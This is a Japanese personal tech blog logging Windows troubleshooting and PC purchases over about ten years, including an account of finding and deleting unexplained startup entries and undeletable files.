NTD TKS

（2021/6/28追記）
「Windows 11」へ更新できるか判定する「PC 正常性チェック」ツールがアップデート～不適格と判定された理由をより詳しく案内
https://forest.watch.impress.co.jp/docs/news/1334325.html
まぁ、そうなりますよね。

（2021/6/27）
純正よりも高機能なWindows11互換性確認アプリ『WhyNotWin11』が登場！
https://www.nichepcgamer.com/archives/how-to-use-whynotwin11.html

うかつにフリーウェアに手を出すのは危険ですが、
マイクロソフトが提供している適合チェックソフト、実行したら「アップグレードだめです」としか表示しなかった。
そんななか、これはチェック観点を可視化してくれて、どこがだめかを教えてくれる。
ＭＳ純正は「素人に詳しく情報提供しても理解できんだろ」な思考で非表示にしたのかもしれないが、情報が出ないのでは、玄人も「なぜだめなのか／私のＰＣはそんな古くないはずですが・・・・」と一層問い合わせが殺到するのではないか。
詳細ボタンで理由を示しておけば、玄人の人たちは自力解決できるわけで。

結局私の場合はＴＰＭがダメだったので、BIOSで有効にしたら、判定ＯＫに変化しました。
デバイスのプロパティでは「ＴＰＭの仕様バージョン2.0、サブバージョン1.3」とあったので、1.3があるとダメかなと思っていたら、そうでもなかったです。
まぁ、アップグレードはしないでしょう。過去にＰＣ乗り換えで、映像や音楽のＤＲＭコンテンツが利用不能になった失敗があるので、コンテンツの元からDRM引っ越しツールが提供されるまでは、ＯＳを変えたらだめですね．．．．
あと、ＴＶチューナボードのデバイスドライバ＆ＴＶ視聴ソフトが正式にwin11対応版を出してくれないと。前に、intelのグラフィックドライバを最新にしたらＴＶ視聴ソフトが起動時に「ビデオドライバがダメ」エラーで起動しなくなって、視聴ソフトのアップデートを待ったこともありました。視聴ソフトには注意書きとして「常に最新版ビデオドライバ環境で」とあったのに。

とにかくアップグレードよりは、新品ＰＣの新しい環境でwin11動かすのが無難でしょう。

イベントビューアーは起動できてるが、カスタムのディレクトリを辿ろうとすると、スナップインのMMCエラーなんとかでアベンドする。プロセス処理が先に進まない。

私がイベントの未使用ログを閉鎖しまくったせいか？とここ数日悩んでいたのですが、6月KBアップデートのデグレらしい？？

https://www.softantenna.com/wp/windows/widnows-10-latest-update-event-viewer-bug/

2019年７月で改修されるのかな。うーむ、待つしかないのか。

■現象
adobeのPhotoshopElements2019を今年２月ごろから使ってるのですが、最近？2019年5月6月？になって、起動して画像を読み込ませて、いざ編集をすると、バチンとアプリが落ちて消滅します。解像度変更とか切り抜きとかするとダウンする。
編集すらしてないのに、数十秒で勝手に落ちる場合もある。
アベンドするとadobeのレポート機能が起動してadobeに送信するけど、その機能すら立ち上がらない場合もある。
落ちる直前はディスク読み書きが必ず激しくなる。
エレメンツがアップデートによりデグレードしてるかと思い、アンインストールして、ＣＤＲＯＭから初期状態のを入れなおしたがエラー現象再発。
次はＯＳの５月アップデートが悪さしてる疑いを持つも、win10homeなのでＯＳを昔に戻すのは手間なので実行せず。
ＳＮＳ検索すると、落ちる現象の人がちらほらいるもよう。でも解決の話題が見つからず。
ネットでは「編集画面サイズを小さくすれば？」とあり、2560*1440のモニタの画面を小さくしてみたが改善せず。

■解決策
過去に戻れないなら、先に進むしかない、モジュールを新しくする方向で検証したが、adobeはエレメンツに何も最近はアップデートを提供してない。
flashやadobereaderは毎月のように出してるのに。
次にＯＳ側を調べると、５月に「intelビデオドライバ25.20.100.6617」「intelマネジメントエンジン1912.12.0.1246」が提供されていた。
正確にはマザボメーカーのasrockが検証完了したとサイトで配布を開始してたものを使用。
これを入れたらエラーが出なくなった？？
とりあえず様子見注視してますが、落ちなくなったか？

障害が発生しているアプリケーション名: PhotoshopElementsEditor.exe、バージョン: 17.0.0.0
例外コード: 0xc0000005
障害オフセット: 0x0000000000004f97
障害が発生しているアプリケーション パス: C:\Program Files\Adobe\Photoshop Elements 2019\PhotoshopElementsEditor.exe
障害が発生しているモジュール パス: C:\WINDOWS\SYSTEM32\ntdll.dll

こっちは、新機種で戸惑ったことへの対策講じの記録です。

■無線が不定期に断絶する？？

マザボの名前「ASRock H310M-ITX/ac」のとおり、Wi-FiのACが内蔵で
ロッドアンテナも二本マザボに挿してあるのですが、
一日２回ほどのペースで切れます。
ＯＳで自動接続の設定をしているので、再接続はなされるのですが、
動画や音声のストリーミング中でもいきなり切れるのでストレスです。
これの原因や規則性がつかめません。
ルータ側が悪い可能性はありますが、前のパソコンでは一切無かった問題ですし。
インターネットでも「win10だと切れる」話はあるものの、私に決定打な解決策に出会わず。
当面は、以下の設定で頻度は低くなっている気がします。
・マザボメーカーの最新ドライバを使う
・2.4Gと5Gのデュアルバンドモードで使う
・intel Wi-Fiの省電力設定はどれも使わない

■イベントビュワーに大量のシステムエラーが出ている

特に「ID　10016」が消せません。
ほかのエラーはインターネット情報でレジストリで解決できましたが。
APPIDが自明なものは「レジストリでコンポーネントサービス管理ツールの変更権限を獲得する」→「dcomcnfg起動して該当のAPPIDを選んで権限を与える」で解消できたのですが、
このAPPIDが大量に権限エラーを起こしているのがおかしい。
インターネットでは「実害ないです、放置していい」との回答が多い。
実害ないならエラーとして表示させるなよ＞マイクロソフト
こつこつつぶしたのですが、以下のように「APPID　利用不可」だとdcomに該当メニューがないので権限をちゃんと与えることができない。

アプリケーション固有 のアクセス許可の設定では、CLSID
Windows.SecurityCenter.WscDataProtection
および APPID　利用不可
の COM サーバー アプリケーションに対するローカル起動のアクセス許可を、アプリケーション コンテナー 利用不可 SID (利用不可) で実行中のアドレス LocalHost (LRPC 使用) のユーザーに与えることはできません。このセキュリティ アクセス許可は、コンポーネント サービス管理ツールを使って変更できます。

イベントID320エラー＝winhelloデバイスが無いため。
レジストリで稼働のフラグを０にすること。

■スタートメニューがカスタマイズしにくい

使わないアイコンを右クリックで削除できないし、好きな行に持っていけない。
windowsボタンの右クリックメニューが増えたのは便利だが、これも変更設定が無い。
コントロールパネルが隠匿されたのは不便。「設定」メニューでは簡単にしか変更できない。
もっと階層をおりると従来のコントロールパネルが出てくるのか。
右クリックメニューにコンパネショートカットを登録するため、隠しフォルダにショートカットを置けばいいらしい。

■ユーザーフォルダ（ライブラリ）の表示が邪魔

win8のときはライブラリと呼んでいたがwin10では単にフォルダーと表示される、ドキュメントやマイピクチャ。
エクスプローラーの上部に表示されるので邪魔。これはレジストリをいじることで消せる。
フォルダの数が減るかな？と思い、ダウンロードフォルダの場所変更をデスクトップにしたら、
デスクトップの名前がダウンロードになって、ダウンロードが２個表示される。win8でもそうなる。
この名前を戻せない・・・・。２個統合しちゃった場所は
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVirsion\Explorer\User Shell Foldersキー
の修復で分離できたが、名称が２つともダウンロードのまま。
https://answers.microsoft.com/ja-jp/windows/forum/windows_vista-files/%E3%83%A6%E3%83%BC%E3%82%B6%E3%83%BC%E3%83%95/83dbec58-6262-4180-812f-1170ab7686be?auth=1
正確には、ファイルエクスプローラーのライブラリは修復できたが、
名前を付けて保存の左ペインに出るライブラリがおかしいまま。
左ペインのレジストリはどこなんだろう。
win7のときみたいに「欲しいライブラリだけ表示、他は削除」と手軽にできないものか。

■その他の設定

タスクバーの時計に秒が表示できない＝レジストリで秒を追加

設定＞システム＞バージョン情報　＝バージョン番号とビルド番号が得られる。
コンパネ＞システム　＝バージョン番号とビルド番号は載ってない

コンパネ＞プログラムと機能　＝インストールしたデスクトップアプリ一覧がある
設定＞システム＞アプリ　＝ストアアプリ一覧
設定＞システム＞アプリ　でもデスクトップアプリ一覧もあるがバージョン情報が載ってない

設定＞システム＞マルチタスク　＝画面端で勝手に整列する機能on-off
再起動＝リブートの場合は、高速起動のステップを踏まず通常起動になる
高速起動＝デフォルトで起動属性は高速起動ONになってなる。古い機体だと高速に対応してなく、
私の会社のＰＣでは高速起動ＯＮだと起動できないのがあった。win8でもできず。

設定＞更新とセキュリティ＞再起動オプション　winupdateで再起動していい指定時刻
設定＞更新とセキュリティ＞アクティブ時間　　winupdateで再起動してはダメな時刻
設定＞更新とセキュリティ＞詳細　winupdateを延期する。homeは延期を拒めない。この強制updateの仕組みもいかがなものか。デグレードの危険性があるのに。
一応レジストリいじれば止められるみたいだが、2018秋版は各ソフトメーカーが動作保証を終えてないし、まだ導入したくないなあ。

スタートメニューの実体ファイル　C:\ProgramData\Microsoft\Windows\Start Menu\Programs
スタートメニュー右クリック実体　%LocalAppdata%\Microsoft\Windows\WinX\Group2、
コントロールパネル　%windir%\system32\control.exe

prtscreen＞　デスクトップ全体を画像でクリップボードへ
win＋prtscreen＞　デスクトップ全体を画像ファイルで保存
Snipping Tool＞　自由に矩形範囲キャプチャ
「Windows」+「Shift」+「S」＞　自由に矩形範囲キャプチャ　2017.01からの機能

win10に買い換えたものの、ＯＳを知らなくて設定チューニングに時間を要しています。
ハードウェアのほうも、新技術で仕様がよくわからないなあ。
昔のMS-DOS時代のほうがシンプルでよかったなあ＞回顧おじさん主義

とりあえずスペックを記録しておく

■2018年11月購入
eX.computerエアロミニMI5J
windows10home64bit・ディスク付
Intel corei5-8400 6コア2.8Ghz、TB時最大4.0Ghz、9MBキャッシュ
Intel H310 mini-ITXマザーボード（ASRock H310M-ITX/ac）
メモリ8GB（1枚）　DDR4-2666
内蔵グラフィックスIntel UHD Graphics 630（DVI-D、HDMI、DP）
ネットワークIntel 802.11ac Wi-Fi（2.4/5Ghz）Bluetooth4.2
ディスクSSD WD BLUE 3D NAND SATA6Gbps
BDXLブルーレイ（HLDS BH16NS58・CyberLink PowerDVD12付）
ＰＣケースeX.computerオリジナル　160w電源
モニタ27インチLCD-MQ271XD（2560*1440）HDMI接続

■2010年06月購入
eX.computerエアロスリムRS3J
windows7ultimate64bit・ディスク付
Intel corei5-660 2コア3.33Ghz、TB時最大3.6Ghz、4MBキャッシュ、HT
Intel H55 microATXマザーボード（Intel DH55TC）
メモリ4GB（2枚）　DDR3-1333
グラフィックスNVIDIA GeForce210/512MB（DVI-D、HDMI、Dsub）
ネットワークLANポートのみ
ディスクHDD 1TB
ブルーレイ（LG）
ＰＣケースeX.computerオリジナル

■新機種にして良かったところ

ワイヤレスを推進できた。配線すっきり：
インターネットには無線。ゲーマーならＬＡＮケーブルでしょうが、部屋配線がうざい。
今までは無線子機を足していましたが、最近はマザーに内蔵なので足さなくていい。
音楽音声も、Bluetoothヘッドホンにしたし、マウスも無線マウス。
キーボードもBluetoothにしようかと思うも、FILCO有線がまだ使えるので。
一番良いキーボードはマイクロソフトだったのですが（プログラムボタンがたくさんついてるやつ）、
テンキー無しで机上をすっきりさせたくて。

HDMIでも配線すっきり：
映像と音声を一本で済ませられる。LCD-MQ271XDには内蔵スピーカーがあるのです。

内蔵グラにしたので筐体もすっきり：
無線子機USBとかビデオカードとか挿すと、ごちゃっとするし筐体のエアフローが悪くなる。
マザボ内蔵で済ませられるものはそうしたほうがいいと思います。

筐体を小型化：
友人たちはノート型が主流ですが、やはりパワーがほしい。
でも部屋を狭くしたくないので、ミニにしました。
九十九電機の前回のスリム型が良かったので、さらに背の低いミニにしました。

処理性能が上がったけど省電力：
i7以上の電気食いは嫌だったので、i5にしました。
つまりフルパワーは欲しいけどすごく熱いのは避けてミドルクラスがいい。
３Ｄゲームはしないので。
タンパク質解析グリッドコンピューティング参加のために
cuda使える高性能グラボに興味あったのですが、
前の機種でパソコン疲弊したので、解析はほどほどに参加しよう。
ＣＰＵも今まで3Ghzで今回2.8なので、普段は電気は節約でき熱くならず
ターボブーストでは4Gまで回せるらしい。
ブーストの効果なのか、解析でフルパワーで回すと、ＣＰＵモニタが
使用率100％を超えるような表示に？？

（なんかＣＰＵ使用率115％になっている？135とかにもなります。）

ディスクをＳＳＤで高速化：
やはりサクサク動かすにはSSD。以前は高額だし小容量で買わなかったのですが、
自分はディスクを消費しないので小容量SSD一本でも十分たりるようです。
（ＴＶ録画をしてますが、見たら削除し、貯めたくない性分）

BDXLで倍増化：
安全のためファイルのバックアップをブルーレイにしてるのですが、
50GBで一枚ディスクは便利。ブランクディスクも安くなりましたし。
まぁ、最近はデフォルトでXL仕様が付いてくるのでしょうけど。

大画面化：
今まで1280*1024でしたが、さすがに狭くて二画面にしてました。
するとロープロファイルなgeforce210では、チップ温度は上がるしファンがうるさくて
負担が大きいようでした。
（ファンが小さいので大口径よりうるさくなる）
インテルも内蔵のが結構性能あがってきたので、内蔵でも良いようです。
2560*1440にしました。広い！
安価なマザボやグラボでは昔は1920出力が限界なポートがあったので、
ちゃんと2560出せるか確認して買いました。

■ツクモ筐体の一番の良いところ

一番嬉しいのは「リセットボタン」が本体にあること。
昔の8bitパソコンのときはＮＥＣやシャープとかの時代にはあったものです。
いまでもＯＳハングアップしたとか、リブートをいちいちメニューから選びたくない、とか
ボタン一つでリセットできるのは快適。

■新機種にして悪くなったところ！？

謎の挙動をするところがあり、その調査と勉強に悪戦苦闘しているため、
ネットへの出現頻度が下がっていたりします。
win8経由して日ごろwinを勉強していれば・・・と思ったのですが
やはりwin10は複雑化隠匿化が進んでいて、直感的に扱えなくなってますね。
そこらへんは次回にレポートしたいです。

こんなにいつの間に収集しとるとは・・・

http://b.hatena.ne.jp/entry/www.orefolder.net/blog/2017/05/google-map-photo-upload/
はてなブックマーク - 撮影した写真が勝手にGoogleマップに投稿される？ 確認すべき設定と通知オフの方法
　
上記のようなエントリが2017年5月7日ごろに多数発生しており、
googleMAPに自分のスマホ写真が投稿、もしくは他人共有状態になっているので旅行写真撮っていた人は注意、
という話です。
自分はスマホで滅多に写真は撮らないので・・・と念の為にgoogleアカウントにログインしてみたら、
写真はアップロードされてはいませんでしたが日々の行動記録が全部記録されてました。
移動ルート履歴とか、スマホでのアプリ起動履歴とか、ＰＣでのChromeやYouTubeの履歴とか
「アクティビティ」「タイムライン」「ロケーション履歴」とか呼ぶらしいです。
スマホでgoogleアカウントを作ったときに、こうした履歴の許可を認めていたのでしょうね、ちゃんと設定の全項目を見ていなかった（汗。
スマホで『google＞設定＞プライバシー』を見てみると、確かに「YouTube履歴を記録する」とかＯＮになってますな（汗
商業施設に行ったときに「チェックインしましょう／他の人のここでの投稿写真がある」とか
ＧＰＳが便利だからＯＮにしてるといろいろ言ってきたが、私の施設訪問がgoogleMAPに座標投稿されていた！？
私はグーグルマップに写真の投稿はなかったけど、ピンがマークされていた・・・
そんなの許可したつもりなかったのに。
しかし「行動履歴をトレースする」をスマホで許していたので、なんと私の毎日の行動移動がＧＰＳ軌跡としてgoogleＭＡＰに残るんですね。びっくり。
勝手に共有はされていないのだけど、まさか毎日の行動がＭＡＰで線で辿れるとは。

まぁおもしろいけど、余計なおせっかいだなぁ。
ＭＡＰで現在地をＧＰＳでリアルタイムで示してくれるだけでいいのに。
さらにおせっかいなことに、訪問先がお店だとランドマーク来店として記録され、「貴方の良く行く場所ベスト○○」
というランキングまで表示するのかよ＞ＭＡＰ
余計だけど、すごい(笑)。
ちなみに、私は外食ばかりなので、松屋とかかつやとかやよい軒とか飲食店が上位になってました(笑)

で、これら履歴は全部消しました。
ブラウザの検索履歴をいちいち記録せんでええし（汗
私が日にツムツム起動してる回数も数えなくていいから。
スマホはXperiaなので、ＳＯＮＹ純正の行動履歴アプリ「LIFELOG」で記録してるので、googleは要らない。
（スマホゲーやりすぎてるので、日に何時間プレイしているか見るために記録）

自分備忘録対処記録メモ。
今日、久しぶりにタスクマネージャを見たら「jubyfa.exe」というプロセスが常駐している？？
スタートメニューに居ないし、サービスにも居ないし、レジストリRUN（HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run）にも居ない。
どこから侵入？？
毎日ネットをうろついていたから？しかしブラウザ閲覧だけで何かインストールなんて．．．
しかし今回は史上最悪にやっかいでした。

（2014年5月追記）
■今度はkxhppo.datが入り込んできた？
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
「regsvr32.exe "C:\ProgramData\kxhppo.dat"」
msconfigで見ると、バイナリ提供者はマイクロソフトとあるが、こんな変な場所にdat置かない。
入りこんだ日付ではChromeをインストールしていたんだが．．．．
検索してもこんなファイルの話題はどこにも無いし、
Chrome入れた後で、あちこちＷＥＢサーフィンしたときに変なの踏んだのか？
でもブラウジングしただけで、\ProgramDataにファイル置けないよなぁ。
うーん、またも侵入を許してしまった。
最近IE10で正常に表示できないサイトが増えたので、サーバ障害か？と思っていたけど
他の利用者はサーバにクレームの書き込みしてないし。
なのでChromeを入れたのでした。それだと正常に表示される！！
ＩＥ１０はオワコンらしい。

（2014年3月）
■消せないファイルの特徴
・実体は「C:\Users\win7\AppData\Local\Temp」自分のプロファイルのtempに居た
・実行コマンドはローカルマシン\runじゃなくユーザ\runに潜伏してた
＊ファイルが削除できない！！ファイル所有者（今回の場合win7という名前）なのに
　「win7のアクセス権が必要です」エラーで削除や改名ができない。私がwin7なのに？？
・ファイルの移動はできる。移動先でも削除できない。
・ファイルをコピーするとエラーが出るが０バイトのファイルで複製され「それも削除できない！」
・Microsoftエッセンシャルでexeをスキャンさせると「できません」エラー！？
　スキャンできないってどういうこと？

■削除の道程
ネットで検索すると「所有者を自分すればいい」ばかりの回答で、ファイルの所有者は最初から自分（今回場合はwin7という）になってる。これをいじろうとすると「win7の許可が必要」とエラーしやがる！？
adminとかguestとかeveryoneとかにファイル所有者を変えても「win7の許可が」と変わらないのがオカシイ。
win7はadminグループなので所有者を変更できたしフルコントールアクセス権あるのに、自分のモノを自分で始末できない？？

封印していたadministratorユーザを登録して（win7では隠されているので、コンピュータの管理から封印解除）、
adminでログインして削除をするもやはりＮＧ。管理者でさえ削除できない？？
Ｆ８ファンクション起動で、セーフモード配下でやってもやはりダメ。

ツールで「DelFile」「unlocker」試すも削除できなかった。

常に「所有者の許可がー」と言うので、コマンドラインでオーナーを強制変更してみる。
pathの短い場所に移動させてからテスト。

C:\Ehm>takeown /f *.exe　　　（／ａが無いのでログインユーザ(win7)に所有権移る）
成功: ファイル (またはフォルダー): "jubyfa.exe" は現在ユーザー "win7-PC\win7" に
よって所有されています。
C:\Ehm>del jubyfa.exe
C:\Ehm\jubyfa.exe　アクセスが拒否されました。

C:\Ehm>takeown /f *.exe /a　　　（／ａでadminグループに書き換え）
成功: ファイル (またはフォルダー): "jubyfa.exe" は現在 Administrators グループに
よって所有されています。

C:\Ehm>del jubyfa.exe
C:\Ehm\jubyfa.exe　アクセスが拒否されました。

C:\Ehm>dir *.exe
2010/06/25 12:15 422,400 jubyfa.exe

2010年とかファイル名「jubyfa」は偽装だろうけど、
コマンド使うと所有者は変えることには成功したが、
結局「Administrators グループの許可が必要」と変わっただけで削除はできない。
win7だってadminグループなのに。

■で、結局ＯＳを変えて削除に成功
最後の手段で、ＨＤＤからbootしてるWindows配下ではどうしようもないので、
別のＯＳをＤＶＤからbootして、そのＯＳに削除をやらせようと考えた。
windows8だと下位互換でご丁寧に7のアクセス権を尊重するかもしれなかったので、
古いvistaを使うことにした。
しかし、
インストールを途中で中断させてコマンドプロンプトを出させたかったのだが、方法判らず。
仕方ないので、ドライバ追加読み込みのボタンを押して
ファイル選択ダイアログウインドウを出させることに成功、そのダイアログで
問題のファイルのあるフォルダに行き、マウス右クリックでフォルダ削除に成功！！

Windowsって、システム属性かなにか知らないが、admin権限でも削除できないファイルあるよね．．．
今回の変なファイルもそういう特殊属性を付加してたのだろうか。

■もうひとつ侵入していた謎ファイル

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ここで別の侵入者を発見したのだが、「regsvr32.exe "c:\programdata\gluzrhny.dat"」
他にもjneaxnoy.datとかqjncfkzu.datとか、暗号な命名。
msconfigで見るとファイル作成microsoft社でＯＳ由来だとシグネチャあるが、
こんな場所にこんな名前で常駐させるか？　ネットで検索しても何も出ない。
誰も困ってないのか？　逆に公式でないファイルなんだろうと判断。
regsrv使っているなんて怖い。日付見ると今週に侵入してる。
何かやったっけなぁぁ？？
とにかく怪しいので削除。特にファイルプロテクトはなかったので削除は成功。

■スタートアップ侵入手口・その他
他の事例だと、ここに仕込んでくる奴も居ましたね
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

海外の怪しいサイトや怪しいフリーウェアを漁るのは危険ですね。
たまに、タスクプロセスと\runをチェックする私は気付けて、増えているものもわかって
削除すべきか判断できますが、
ＰＣに詳しくない人は、変なのが常駐しても気付かないでしょうし、
先のような削除できないのなんか、私だって怖かったです。
ネットでjubyfa.exeでは全くヒットしなかったので、いったい何者だったのやら。
しかし今回、「強制削除できるフリーソフト」とか藁にもすがる思いで試用したので、
感染侵入に結局セキュリティ充分でないですね私は（汗

まぁ、みなさんもたまにはＰＣの中を監査してみましょう．．．ってことで。
にしても、久しぶりのブログでした。
公私ともども忙しく、ネットは読むけど書き込む時間がなかなかとれません．．．
書きたい話題はたくさんあるのですが。

■最低でも９万円するがスペックも高いので割に合うコストパフォーマンス

２０１１年７月にXPS8300買いました。デルは会社でも自宅でも何度も買っているメーカーです。
ＢＴＯがシンプルで、余計なものが搭載されてないし、国内メーカより安い。

■出荷準備中．．．

欠点第一は海外製造で納品に時間かかることか。今回も二週間かかりました。
日本到着まで４日間で早い！と今回期待するも税関で長く停滞しました。
あのオーダーステータス本当の状況表しているのか？
蕎麦屋の「いま出前出ましたー」と嘘いってるみたいな？(笑)
２ちゃんねるには、オーダーステータスを見守るスレッドもあるのか。

■ミドルタワーで重くない

去年にツクモでエアロスリム買ったのですが、それよりは重いですが
フルタワー防振型よりは小さくて軽い。それで拡張性もある。
写真とかは公式や各所レビューに詳しいので譲りますが
S-ATA４本丁度の拡張性があっていい。エアロスリムは拡張性が無いし、
前のantecのフルタワーはたくさん内蔵増設できるが実際たくさんは要らなかったし、
電源分岐延長でケーブル配線がわずらわしかった。
XPSは最初から４本ぶんの電源ケーブルがありますので、SATAだけ買ってくればいい。

■フロントとトップのデザインが凝ってる

フロント中央はスライドして降りて開くギミック。
フロント上部のブルーレイはパネルにバネがあってトレイがそれを押しのけて開く。
全体的に角張ってなくてトップの凹みはやはりいいかも。
一番いいのは、USBケーブルが常時通電してること。パソコンをシャットダウンしても
ＵＳＢでiPhoneやPSPや携帯電話を充電できる。

■価格は安くできないＢＴＯ

XPS8300の欠点は、カスタマイズがあまりできない。
７月に買った時分には、ＣＰＵ変えられないし、８ＧＢメモリが最低。
８ギガも要らないのだがそれ以下が選べない。ブルーレイとビデオカードへアップグレードしてベース８万円から１１万円。
ところが今ＤＥＬＬのサイト見たら（2011/8/8）、メモリが最低でも１２ギガから？？
それで同じ価格帯だから円高還元なんですかね？しかし１２ＧＢもどうするんだよ。
スペック下げて値段をさげずに上乗せして価格を維持してやがる。
まぁ損ではないのですがねぇ。
これなら秋葉原のショップ白箱で４ＧＢぐらいの規模のを選んだほうが安くていいかも。
秋葉原も今はメモリあたりが値下がってますね。

■３台目のＨＤＤは５インチベイ

シャドウベイが２台までなので、プライマリセカンダリを取り付けたら
三台目は５インチベイへ。マウンタでゲタ履かせましたが、筐体のフロントのマスクパネル、金属板なんですが固くて切り取りにくかった。
普通はプラモデルのランナーのようにすごく細くつながっているのでぶちっと切れるのですが
ＸＰＳのはそれが太くて切り取りが大変でした。
説明書ではドライバーを差し込んでねじれば外れるとあったが嘘だ．．．

５インチベイは２つあるんですが、右側２本がネジ止めが不要。左二本だけで止めるデザイン。
両面からネジ締めなくてラクではあるのですが、省略していいんかな．．．
ＨＤＤシャドウベイは籠型で取り外せるのですが、
他のカゴだとＨＤＤ二個を取り付けてから筐体に．．．という仕組みなんですが
こいつは１個だけ。まぁこれもマニュアルを良く見て構造予習しましょう。
．．．とまぁ筐体がちょっとマニアックな造りになってますね。
事前にＷＥＢのＤＥＬＬサポートでマニュアルを読むと吉。
（フロント外装パネルの外し方とか予習しておかないと、プラスチックなので爪とか誤って折るかも）
配送物には紙のマニュアルはありませんので注意。ＣＤＲＯＭ。

SATAは４ポートあって、１番２番が６Ｇbps対応らしい。
ＨＤＤが6G対応や高速転送ならそこに繋ぎたいところ。
３ＴＢな新しいデバイスもちゃんと認識できました。
（去年買ったエアロwin7-64bitにも外付けで３ＴＢは自動認識できました。
　よほど古い機体でなければ大丈夫かな）

ＣＰＵは８スレッドだし（４コア×ＨＴテクノロジー）
余ったメモリはＲＡＭディスクにすればなかなかパワフルです＞XPS8300
ＤＥＬＬのこれより上位でなく、この基本モデルでも十分使えそうです。

windowsアプリケーションの小話いろいろ

■ＸＰ専用？ＭＳ純正ロゴスクリーンセーバー

昔、winNTにあったpipeってスクリーンセーバが好きでした。パイプ配管をひたすら３Ｄ描画するやつ。
エルボ（配管曲がるところ）をランダムに設定すると稀に「ポット」のオブジェクトが出現するというイースターエッグの仕掛けがありましたっけ。
今でも職場ではＸＰがメインＯＳなのですが、何かセーバがないか探したら
マイクロソフト純正で３Ｄでロゴがはためくのがありました。
http://www.microsoft.com/windowsxp/downloads/desktop/xpscreensaver.mspx
ハードウェアアクセラレータ機能が弱いと表示ちょい厳しいくらいに大きくウネウネとうごめきます。
ご丁寧にＯＳチェックをしててwin2003serverR2では動作せず。
でも、ＸＰ互換モードにすれば動かせた。

■エプソンスキャナとフォトショップが連携しない不便

VISTAでElements旧版が動作不良で画面描画が崩れるし、上部メニューが横一列で
私のモニタの1280ドットだと尺が足りなくてメニューが見切れるとか使い勝手最悪だったので
仕方なく最新のElements 9にアップグレードしました。
ウインドウ拡縮がやっとまともにできるし、メニューも二段表示になった。
ところが、９になると今まで使えていたEPSON Scan（エプソンのスキャナ装置の読み込みユーティリティ）との連携ができなくなった。
９の読み込みメニューにEPSON機器が出てこない。EPSON Scanをインストールしても。
ちゃんとエプソンの側は64bit版だし７対応とあるのに？？

エプソンのＦＡＱで以下を見つける。
http://faq.epson.jp/faq/00/app/servlet/qadoc?030792
Ｑ：
Adobe Photoshop CS4/CS5からスキャンしたいのですが、メニューにスキャナーの機種名が表示されません
Ａ：
Adobe Photoshopからスキャンするためには、スキャナードライバーの他にTWAINプラグインが必要になります。TWAINプラグインをインストールするか、EPSON Scanでスキャンした画像をファイルに保存してから、Photoshopで開いてください。

TWAINプラグインを入れるってのが具体的にどうすればいいか不明で、
結局上にあるように「EPSON Scanでスキャンした画像をユーティリティ単体でファイル保存して、そのあとでフォトショに読み込み」って運用してました。
めんどくさい！！
フォトショから読込を起動するとＯＳ汎用のスキャナアプリが起動し、それでスキャンはできる。
でもEPSON Scanが持っている非常に細かな設定変更が使えないのが不便。
雑誌印刷のモアレ低減とかホコリ取りとか色調変更とかトリミングとか。

最新版フォトショで逆に不便なのはあまりに理不尽なので調べたら、
9発売後アドビにＦＡＱが追加されたようです。なんだかなあ。
http://kb2.adobe.com/jp/cps/872/cpsid_87214.html
Ｑ：
Adobe Photoshop Elements 9 でスキャナーなどの TWAIN 互換機器が使用できません。Photoshop Elements 8 および以前のバージョンでは使用できました。
Ａ：
Photoshop Elements 9 の初期設定では、TWAIN プラグインは無効にされています。
この問題を解決するには、TWAIN プラグインを有効化します。

1.Photoshop Elements を終了します。
2.フォルダーを開きます。
C:\Program Files\Adobe\Photoshop Elements 9\Optional Plug-Ins\Import-Export
3.「Twain_32.8BA」（Windows）ファイルをコピーします。
4.コピーしたプラグインファイルをペーストします。
C:\Program Files\Adobe\Photoshop Elements 9\Locales\ja_JP\Plug-Ins\Import-Export
5.Photoshop Elements を起動します。

これで９のメニューにエプソンの機番が表示されるようになりました。
これで起動するとＥＰＳＯＮ純正のユーティリティが起動してスキャンするとそのままフォトショに転送されます。
わざわざ無効化していたとは。
私のスキャナもGT-9400UFで2003年製で古くなった。しかし3200dpi解像度は十分すぎる。
普通は300dpiもあれば印刷物は綺麗に読めるから。買い替える理由がない．．．
最新機種だとスキャン時の音が静かになってるのかな．．．
ＣＣＤは筐体が分厚いですが、CMOSは読み取りピント深度や鮮明さでダメでしたが、
今のCMOSは性能いいのかなあ。CCDでかいんですよね、ＡＣ電源が必要だし、
ＵＳＢケーブルだけってのは手軽でよかったなあ。

■WesternDigitalの２ＴＢと３ＴＢのＨＤＤ

２ＴＢは2009年登場当時は35000円
http://pc.nikkeibp.co.jp/article/news/20090227/1012724/
登場当時はどんだけプラッタに密に詰め込んでいるんだよ！と思いましたが、
2011年の現在では普通に買えるシロモノになりましたね。
私は2010年に２ＴＢをツクモで買いました。
そして今年に３ＴＢもツクモで買いました。9500円くらい。WESTERN DIGITAL WD30EZRX
保証とか付加して＋500円出せば１万円超えるので
つくもたん紙袋をもらえたのに。あとでＨＤＤマウンタ（５インチベイ用）買ったのですが一緒に買えばよかった。
仕方ないね。

2011年８月情報。パナソニックのＢＤメディア買うとつくもたんポスターとかもらえるらしい。
http://akiba-pc.watch.impress.co.jp/hotline/20110806/price.html
１万円よりハードル低くていい。同じページに窓辺ななみの新作夏イラストも登場との紹介もあり。

３ＴＢのときは紙箱に入ってました。帯電防止ビニールの外箱。
一般的にそういうコスト手間はかけない業界だったのに。
一枚紙なので耐衝撃性あるダンボールとかではないです。
回転数は噂では5400rpmぐらいで低速だとされてますが、スペックでは6Gbps転送対応とある。６Ｇなマザボだと高速になるのかな？
DELL XPS8300買ってるのですがベンチマークしてないです。
でも大容量のは「触って熱い!」と思っていたので発熱抑止での低速回転はいいと思います。
でもＷＤの２ＴＢも結構熱くなる。３ＴＢは内蔵しちゃって触ってなく未確認。
とにかくコストパフォーマーンス的にＷＤはいいと思います。

（2011.7.12追記）
先日のニュースで、ソフバンの通信網がバグでなく意図的に異常動作して犯人逮捕のニュース、
すぐに発動せずに、犯人が会社を離れてからなんて、
機動警察パトレイバー劇場版１の帆場暎一を思い出したのですが、
http://temple-knights.com/archives/2011/07/softbank-network-down-Inside-job.html
やはり皆さんもそうでしたか(笑)。
しかし、プログラムの無謬性は、どのように保証担保されるのか？
複雑で高度なシステムになると、レビューや監査や検収でバグすら見逃すのに、恣意的に組み込まれ意識して隠蔽されてるウイルスなロジックを防げるだろうか。
